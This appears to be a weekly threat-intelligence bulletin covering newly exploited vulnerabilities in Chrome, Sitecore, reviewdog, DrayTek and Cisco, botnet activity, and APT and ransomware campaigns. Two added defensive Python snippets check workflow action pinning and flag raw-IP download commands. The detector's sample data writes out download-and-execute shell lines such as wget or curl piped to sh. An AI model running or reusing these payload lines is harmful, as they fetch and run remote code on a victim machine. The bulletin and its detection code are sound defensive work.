Executive Summary
This week saw critical cybersecurity developments, including four new CISA KEV catalog additions: two in Sitecore CMS and Experience Platform, one in Google Chrome, and one in reviewdog action-setup for GitHub Actions. Active exploitation trends remain a major concern, with GreyNoise detecting attacks on DrayTek routers, while the SANS Internet Storm Center observed ongoing exploitation of unpatched Cisco Smart Licensing Utility systems.
Meanwhile, botnet activity surged, as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st targeted Cloud Gateway, GitLab, and PHP vulnerabilities, while Bashlite, BrickerBot, Tsunami, and Mirai ramped up attacks on IoT devices, particularly Eir D1000 modems.
Cyber-espionage campaigns continue to emerge, with Kaspersky Labs uncovering "Operation ForumTroll," leveraging a Google Chrome zero-day for espionage. Meanwhile, Quorum Cyber identified active exploitation of VMware ESXi, Workstation, and Fusion vulnerabilities by APT28, APT29, and APT41. Trend Micro reported Russian threat actor Water Gamayun exploiting a zero-day in Microsoft Management Console (MMC), highlighting the growing use of software vulnerabilities for intelligence gathering.
Separately, Symantec identified Backdoor.Betruger, a multi-functional backdoor deployed by RansomHub affiliates, with attackers also exploiting a Windows privilege escalation vulnerability and a Veeam credential-leaking vulnerability to strengthen their attacks.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping defenders make informed decisions.
A Sandbox Escape Vulnerability in Mojo within Google Chrome for Windows, affecting versions prior to 134.0.6998.177, has been actively exploited as a zero-day, posing a significant security risk with a high CVSS Score of 8.3. The flaw has been leveraged in targeted attacks against organizations in Russia, prompting Google to release a fix in version 134.0.6998.178, which is now being rolled out globally to users in the Stable Desktop channel. Due to its active exploitation, the vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, highlighting its severity. To mitigate the risk, users are strongly urged to update their browsers immediately.
An Embedded Malicious Code Vulnerability has been identified in the reviewdog/action-setup GitHub Action, which exposes sensitive secrets by logging them in GitHub Actions Workflow Logs. This vulnerability, rated with a high CVSS Score of 8.6, affects versions prior to 0.17.2. To mitigate the risk, users are strongly advised to update to version 0.17.2. This flaw has also been added to the CISA KEV catalog.
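As an added example (not from the advisory or the reviewdog project), the check a defender would run over a repository's workflows: it lists every `uses:` step referenced by a mutable tag or branch rather than a full commit SHA, since a tag can be repointed at injected code while a SHA cannot. The workflow text and the 40-hex SHA are constructed placeholders.

```python
import re

# Constructed sample workflow: one step references the action by a mutable
# tag, another is pinned to a full commit SHA (placeholder value, not a real
# reviewdog commit).
SAMPLE_WORKFLOW = """\
name: lint
on: [pull_request]
jobs:
  review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: reviewdog/action-setup@v1  # mutable tag: whoever controls the tag controls the code
      - uses: reviewdog/action-setup@0123456789abcdef0123456789abcdef01234567  # SHA pin (placeholder)
      - run: reviewdog -version
"""

USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def parse_uses(workflow_text):
    """Return (line_no, action, ref) for every `uses:` step in the workflow."""
    found = []
    for n, line in enumerate(workflow_text.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        spec = m.group(1)
        if spec.startswith("./") or spec.startswith("docker://"):
            continue  # local and container actions are not resolved from a GitHub tag
        action, _, ref = spec.partition("@")
        found.append((n, action, ref))
    return found


def mutable_refs(workflow_text):
    """List steps whose ref is a tag or branch rather than a 40-hex commit SHA."""
    return [(n, a, r) for n, a, r in parse_uses(workflow_text) if not SHA_RE.match(r)]


if __name__ == "__main__":
    for n, action, ref in mutable_refs(SAMPLE_WORKFLOW):
        print(f"line {n}: {action}@{ref} is not pinned to a commit SHA")
```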
A Federation Denial-of-Service (DoS) Vulnerability in Synapse, an open-source Matrix homeserver implementation, has been identified with a high CVSS score of 7.1. This flaw, affecting versions up to 1.127.0, enables a malicious server to send specially crafted malformed events, preventing a vulnerable Synapse server from federating with other servers. Actively exploited as a zero-day, this vulnerability can lead to significant denial-of-service conditions. The issue has been addressed in Synapse version 1.127.1, and administrators are strongly urged to update their servers immediately to mitigate the risk.
A Use of Static Administrative Credential Vulnerability in the Cisco Smart Licensing Utility allows an unauthenticated, remote attacker to gain unauthorized access to affected systems. Rated as critical with a CVSS Score of 9.8, this flaw impacts versions 2.0.0, 2.1.0, and 2.2.0. Cisco released software updates in September 2024 to address the issue. Meanwhile, the SANS Internet Storm Center has reported active exploitation attempts against unpatched systems. Users are strongly advised to apply the patches immediately to mitigate the risk.
A Sensitive Information Disclosure Vulnerability in the Cisco Smart Licensing Utility poses a critical security risk with a CVSS score of 9.8. This vulnerability affects versions 2.0.0, 2.1.0, and 2.2.0, potentially allowing unauthorized access to sensitive data. Cisco has addressed this issue by releasing security updates in September 2024. However, unpatched versions remain exposed to active exploitation attempts, as reported by the SANS Internet Storm Center. Organizations using affected versions are strongly advised to apply the latest patches immediately to mitigate the risk.
A Path Traversal Vulnerability in the DownloadFileServlet endpoint of DrayTek VigorConnect, affecting version 1.6.0-B3, allows an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges, posing a significant security risk with a CVSS score of 7.5 (High). To address this issue, DrayTek released version 1.6.1 in October 2021. However, GreyNoise has recently detected in-the-wild exploitation, observing activity from 23 unique IPs in the past 30 days. Users are strongly urged to update to the patched version to prevent potential exploitation.
A Path Traversal Vulnerability in the WebServlet endpoint of DrayTek VigorConnect, affecting version 1.6.0-B3, allows an unauthenticated attacker to download arbitrary files from the underlying operating system with root privileges, posing a significant security risk with a CVSS score of 7.5 (High). To address this issue, DrayTek released version 1.6.1 in October 2021. However, GreyNoise has recently detected in-the-wild exploitation, observing activity from 22 unique IPs in the past 30 days. Users are strongly urged to update to the patched version to prevent potential exploitation.
A Remote Code Execution Vulnerability in DrayTek Vigor3900, Vigor2960, and Vigor300B routers allows attackers to execute arbitrary code due to an unspecified security flaw. To address this issue, DrayTek released firmware version 1.5.1 in 2021 to patch this vulnerability. However, GreyNoise has recently observed active exploitation in the wild, detecting activity from 82 unique IPs in the past 30 days. Users are strongly urged to update their devices to the latest firmware to prevent potential attacks.
A Deserialization Vulnerability has been identified in the Sitecore CMS and Experience Platform (XP), specifically within the Sitecore.Security.AntiCSRF module. Rated with a CVSS Score of 9.8, this critical flaw allows an unauthenticated attacker to execute arbitrary code by sending a maliciously crafted serialized .NET object in the HTTP POST parameter _CSRFTOKEN. The vulnerability affects Sitecore CMS versions 7.0–7.2 and XP 7.5–8.2 and has been exploited as part of an attack chain alongside CVE-2019-9875. A proof-of-concept (PoC) was publicly released by Synacktiv researchers in 2019, and this vulnerability has now been added to the CISA KEV catalog.
A Deserialization Vulnerability has been identified in the Sitecore CMS and Experience Platform (XP), specifically within the Sitecore.Security.AntiCSRF module. This flaw enables an authenticated attacker to execute arbitrary code by sending a maliciously crafted serialized .NET object in an HTTP POST parameter. Affecting Sitecore versions up to 9.10, this vulnerability has been rated with a high CVSS Score of 8.8. The vulnerability has been added to the CISA KEV catalog, acknowledging active exploitation in the wild.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. The top 5 CVEs are presented, selected on payloads suggestive of botnet activity, such as wget fetching a second stage from a raw IP address.
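As an added example (not Loginsoft's own sensor logic), the heuristic the paragraph describes, written as detection code: each captured payload is scanned for a download client (wget, curl or tftp) whose target host in the same shell command is an IP literal rather than a hostname. The sample payloads and addresses are constructed from documentation ranges.

```python
import ipaddress
import re

# Constructed sample payloads in the style of request bodies or query strings a
# sensor captures; none are real captures from this report.
SAMPLE_PAYLOADS = [
    "cd /tmp; wget http://203.0.113.7/bins/arm7 -O x; chmod +x x; ./x",
    "curl -s http://198.51.100.23:8080/lol.sh | sh",
    "wget https://downloads.example.org/release.tar.gz",
    "ping -c 1 192.0.2.9",
    "wget http://[2001:db8::1]/bot.sh",
]

# A download client and the remainder of its shell command (up to ; | &).
CMD_RE = re.compile(r"\b(?P<tool>wget|curl|tftp)\b(?P<rest>[^;|&\n]*)")
# Dotted-quad IPv4 not embedded in a longer token, or a bracketed IPv6 host.
IPV4_RE = re.compile(r"(?<![\w.])(\d{1,3}(?:\.\d{1,3}){3})(?![\w.])")
IPV6_RE = re.compile(r"\[([0-9A-Fa-f:.]+)\]")


def fetch_indicators(payload):
    """Return (tool, ip) pairs for every download command aimed at an IP literal."""
    hits = []
    for m in CMD_RE.finditer(payload):
        rest = m.group("rest")
        for cand in IPV4_RE.findall(rest) + IPV6_RE.findall(rest):
            try:
                ip = ipaddress.ip_address(cand)
            except ValueError:
                continue  # e.g. 999.1.1.1 or a version string that only looks like an address
            hits.append((m.group("tool"), str(ip)))
    return hits


def flag_payloads(payloads):
    """Map payload index -> indicators for every payload carrying a raw-IP download."""
    flagged = {}
    for i, payload in enumerate(payloads):
        hits = fetch_indicators(payload)
        if hits:
            flagged[i] = hits
    return flagged


if __name__ == "__main__":
    for i, hits in flag_payloads(SAMPLE_PAYLOADS).items():
        print(f"payload {i}: {hits}")
```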
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
Kaspersky's Global Research and Analysis Team (GReAT) has uncovered a state-sponsored APT attack, dubbed Operation ForumTroll, which exploits a zero-day vulnerability, CVE-2025-2783, in Google Chrome to conduct cyber-espionage against Russian media professionals and academic institutions. The attack begins with phishing emails impersonating invitations to the Primakov Readings forum, containing malicious links that redirect victims to an attacker-controlled website. If a Windows PC user with Google Chrome or any Chromium-based browser clicks the link, malware is deployed automatically, requiring no further action from the victim. The CVE-2025-2783 vulnerability, a logic flaw between Chrome and the Windows operating system, enables sandbox protection bypass, allowing attackers to execute remote code. Kaspersky reported the flaw to Google, which swiftly released a patch. Given the highly targeted nature of the attack, organizations are urged to immediately apply the latest Chrome security update and strengthen their phishing defenses to mitigate the risk.
CVE-2025-22224, CVE-2025-22225 and CVE-2025-22226
According to Quorum Cyber, these critical vulnerabilities in VMware products, specifically targeting ESXi, Workstation and Fusion, pose significant security risks, including remote code execution, sandbox escape, and information disclosure. These vulnerabilities have been actively exploited by Advanced Persistent Threat (APT) groups that specialize in attacking virtualization technologies, particularly in sectors such as telecommunications, finance, and critical infrastructure primarily in regions with advanced cloud and virtualization deployments. Among the notable threat actors exploiting these flaws are APT28 (aka Fancy Bear), APT29 (aka Cozy Bear), and APT41.
- APT28: A Russian cyber-espionage group known for targeting government, military, and security organizations.
- APT29: Another Russian state-sponsored group that focuses on high-profile espionage campaigns against government entities, research institutions, and critical infrastructure firms.
- APT41: A Chinese cyber-espionage and cyber-crime group that operates with a dual mission, conducting state-sponsored intelligence gathering while simultaneously engaging in financially motivated cyberattacks.
Trend Micro Research has uncovered a cyber-espionage campaign orchestrated by the Russian threat actor Water Gamayun (also known as EncryptHub and Larva-208), which exploits a zero-day vulnerability, CVE-2025-26633, in the Microsoft Management Console (MMC) framework to execute malicious code. Dubbed MSC EvilTwin, this attack technique manipulates .msc files and the Multilingual User Interface Path (MUIPath) to download and execute malicious payloads, establish persistence and exfiltrate sensitive data from compromised systems. This vulnerability allows attackers to infiltrate target environments using a sophisticated arsenal of malware, including the EncryptHub stealer, DarkWisp backdoor, SilentPrism backdoor, MSC EvilTwin loader, Stealc and Rhadamanthys stealer.
CVE-2023-27532 and CVE-2022-24521
According to the Symantec Threat Hunting Team, at least one affiliate of the RansomHub ransomware-as-a-service (RaaS) operation has begun using a new custom backdoor, identified as Backdoor.Betruger, in its attacks. This multi-function backdoor, seemingly designed specifically for ransomware deployment, integrates capabilities that are typically spread across multiple pre-ransomware tools. These include screenshot capture, keylogging, file exfiltration to a command-and-control (C&C) server, network scanning, privilege escalation, and credential dumping. Betruger is just one of several tools used by RansomHub affiliates, who have also adopted the Bring Your Own Vulnerable Driver (BYOVD) technique to bypass security measures, notably using EDRKillShifter to disable endpoint detection and response (EDR) solutions. Additionally, attackers have leveraged multiple vulnerabilities, including CVE-2022-24521, a Windows privilege escalation exploit, and CVE-2023-27532, a Veeam exploit that exposes backup credentials.
PRE-NVD observed for this week
Pre-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/03/27/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/alerts/2025/03/26/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.quorumcyber.com/threat-intelligence/zero-day-vulnerabilities-in-vmware-esxi-workstation-and-fusion-exploited/
- https://www.security.com/threat-intelligence/ransomhub-betruger-backdoor#Ransomware
- https://www.trendmicro.com/en_us/research/25/c/cve-2025-26633-water-gamayun.html
- https://www.kaspersky.co.in/blog/forum-troll-apt-with-zero-day-vulnerability/28692/
- https://www.greynoise.io/blog/in-the-wild-activity-against-draytek-routers
- https://isc.sans.edu/diary/Exploit+Attempts+for+Cisco+Smart+Licensing+Utility+CVE202420439+and+CVE202420440/31782/